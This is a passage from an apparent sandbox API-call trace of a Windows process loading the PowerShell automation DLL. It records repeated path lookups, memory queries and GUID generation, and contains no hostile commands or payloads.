lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.913] GetLastError () returned 0x0 [0052.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.913] GetLastError () returned 0x0 [0052.913] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.913] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.913] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.914] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.914] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.916] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.916] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.916] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe026d500, Data2=0x3bc5, Data3=0x421b, Data4=([0]=0xae, [1]=0xe1, [2]=0x41, [3]=0x29, [4]=0x54, [5]=0x10, [6]=0x6, [7]=0x94))) returned 0x0 [0052.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.918] GetLastError () returned 0x0 [0052.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.919] GetLastError () returned 0x0 [0052.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.919] GetLastError () returned 0x0 [0052.919] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xad238925, Data2=0x4ab0, Data3=0x4bfb, Data4=([0]=0xac, [1]=0xe6, [2]=0x46, [3]=0xae, [4]=0x29, [5]=0x5, [6]=0x8d, [7]=0x45))) returned 0x0 [0052.920] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.924] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.925] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.925] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.926] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.926] VirtualQuery (in: lpAddress=0x14d324, lpBuffer=0x14e324, dwLength=0x1c | out: lpBuffer=0x14e324*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.926] VirtualQuery (in: lpAddress=0x14d360, lpBuffer=0x14e360, dwLength=0x1c | out: lpBuffer=0x14e360*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.930] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.930] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.930] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x78bb53cb, Data2=0x4285, Data3=0x473e, Data4=([0]=0xa5, [1]=0xee, [2]=0x1c, [3]=0x6c, [4]=0xf0, [5]=0x72, [6]=0xb, [7]=0x69))) returned 0x0 [0052.931] VirtualQuery (in: lpAddress=0x14d324, lpBuffer=0x14e324, dwLength=0x1c | out: lpBuffer=0x14e324*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.931] VirtualQuery (in: lpAddress=0x14d360, lpBuffer=0x14e360, dwLength=0x1c | out: lpBuffer=0x14e360*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.931] VirtualQuery (in: lpAddress=0x14d42c, lpBuffer=0x14e42c, dwLength=0x1c | out: lpBuffer=0x14e42c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.932] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x844eb57a, Data2=0xedfa, Data3=0x4e4c, Data4=([0]=0xb5, [1]=0x7, [2]=0xef, [3]=0xef, [4]=0x4d, [5]=0xa0, [6]=0xf2, [7]=0xf1))) returned 0x0 [0052.932] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x2a7e6189, Data2=0x4343, Data3=0x4871, Data4=([0]=0xac, [1]=0x70, [2]=0xf5, [3]=0x8d, [4]=0xe4, [5]=0x52, [6]=0x67, [7]=0xd5))) returned 0x0 [0052.932] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x99d5b00b, Data2=0x20ad, Data3=0x4b63, Data4=([0]=0x80, [1]=0xbe, [2]=0x59, [3]=0xe2, [4]=0x7c, [5]=0x4, [6]=0x49, [7]=0x73))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x23354fc8, Data2=0xbf31, Data3=0x494d, Data4=([0]=0x99, [1]=0x5b, [2]=0xad, [3]=0xeb, [4]=0x3, [5]=0xc8, [6]=0xf4, [7]=0x9a))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd7c8929e, Data2=0x163b, Data3=0x4c25, Data4=([0]=0xba, [1]=0xd6, [2]=0xb4, [3]=0x3e, [4]=0xd8, [5]=0xd5, [6]=0x49, [7]=0x9d))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xa070b0c1, Data2=0xf3b1, Data3=0x4483, Data4=([0]=0x8b, [1]=0xff, [2]=0x27, [3]=0x11, [4]=0x5f, [5]=0x5d, [6]=0x4a, [7]=0xc5))) returned 0x0 [0052.933] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7541758e, Data2=0x16fc, Data3=0x4a52, Data4=([0]=0x96, [1]=0x36, [2]=0xe, [3]=0x47, [4]=0xc7, [5]=0xd1, [6]=0x66, [7]=0xf9))) returned 0x0 [0052.934] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xcb7a2363, Data2=0x96f, Data3=0x4b92, Data4=([0]=0xb3, [1]=0xe4, [2]=0xa1, [3]=0x5a, [4]=0xed, [5]=0x1d, [6]=0xbb, [7]=0x4a))) returned 0x0 [0052.934] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.934] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.934] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.935] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.936] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.937] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, 